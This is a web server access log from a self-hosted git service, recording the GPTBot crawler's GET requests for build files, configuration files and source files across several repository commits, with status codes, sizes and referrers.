"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" +[17/Feb/2026:16:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:16:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11248] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12339] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10170] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10147] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10169] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" +[17/Feb/2026:16:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11570] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" +[17/Feb/2026:16:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21358] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21065] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21357] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10710] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10710] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11079] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13576] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83218] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:16:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" +[17/Feb/2026:16:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr 